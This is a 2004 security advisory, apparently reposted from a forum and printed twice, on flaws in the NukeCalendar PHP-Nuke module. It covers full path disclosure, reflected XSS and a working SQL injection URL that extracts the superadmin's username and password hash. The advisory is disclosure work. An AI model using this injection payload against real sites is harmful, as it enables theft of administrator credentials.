Janek Vind
08/04/04, 22:15
{================================================= ===============================}
{ [waraxe-2004-SA#015] }
{================================================= ===============================}
{ }
{ [ Multiple vulnerabilities in NukeCalendar v1.1.a ] }
{ }
{================================================= ===============================}
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=15
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NukeCalendar v1.1.a
PHP-Nuke Calendar Module for PHP-Nuke
Copyright (c) 2002 by Andi (info@shiba-design.de)
http://www.shiba-design.de
Nuke Calendar is based on EventCalendar 2.0
Copyright (c) 2001 Originally by Rob Sutton
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure:
Let's try request like this -
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar
and we get standard error messages, revealing the full path to the nuke engine scripting files:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php on line 286
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php on line 494
Another problem are blocks "block-Calendar.php", "block-Calendar1.php" and "block-Calendar_center.php":
http://localhost/nuke71/blocks/block-Calendar.php
http://localhost/nuke71/blocks/block-Calendar1.php
http://localhost/nuke71/blocks/block-Calendar_center.php
.... and we get many error messages. By the way - blocks in phpnuke contain always protecting
code like this in block-Calendar.php:
if (eregi("block-Calendar2.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}
But as we can see, software author renamed the script without correcting this protecting code. So
we can call this block script directly and it will lead to massive stream of error messages.
2. Cross-Site Scripting aka XSS:
Example request:
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]
POST request is preffered because of the restrict filter against GET request in mainfile.php .
3. Sql injection:
This sql injection exploit can pull out from database any information, for example superadmin's username
and password's md5 hash:
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,n ull,null,null,null,null,null%20%20FROM%20nuke_auth ors%20WHERE%20radminsuper=1%20LIMIT%201/*
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
{ [waraxe-2004-SA#015] }
{================================================= ===============================}
{ }
{ [ Multiple vulnerabilities in NukeCalendar v1.1.a ] }
{ }
{================================================= ===============================}
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=15
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NukeCalendar v1.1.a
PHP-Nuke Calendar Module for PHP-Nuke
Copyright (c) 2002 by Andi (info@shiba-design.de)
http://www.shiba-design.de
Nuke Calendar is based on EventCalendar 2.0
Copyright (c) 2001 Originally by Rob Sutton
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure:
Let's try request like this -
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar
and we get standard error messages, revealing the full path to the nuke engine scripting files:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php on line 286
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php on line 494
Another problem are blocks "block-Calendar.php", "block-Calendar1.php" and "block-Calendar_center.php":
http://localhost/nuke71/blocks/block-Calendar.php
http://localhost/nuke71/blocks/block-Calendar1.php
http://localhost/nuke71/blocks/block-Calendar_center.php
.... and we get many error messages. By the way - blocks in phpnuke contain always protecting
code like this in block-Calendar.php:
if (eregi("block-Calendar2.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}
But as we can see, software author renamed the script without correcting this protecting code. So
we can call this block script directly and it will lead to massive stream of error messages.
2. Cross-Site Scripting aka XSS:
Example request:
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]
POST request is preffered because of the restrict filter against GET request in mainfile.php .
3. Sql injection:
This sql injection exploit can pull out from database any information, for example superadmin's username
and password's md5 hash:
http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,n ull,null,null,null,null,null%20%20FROM%20nuke_auth ors%20WHERE%20radminsuper=1%20LIMIT%201/*
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------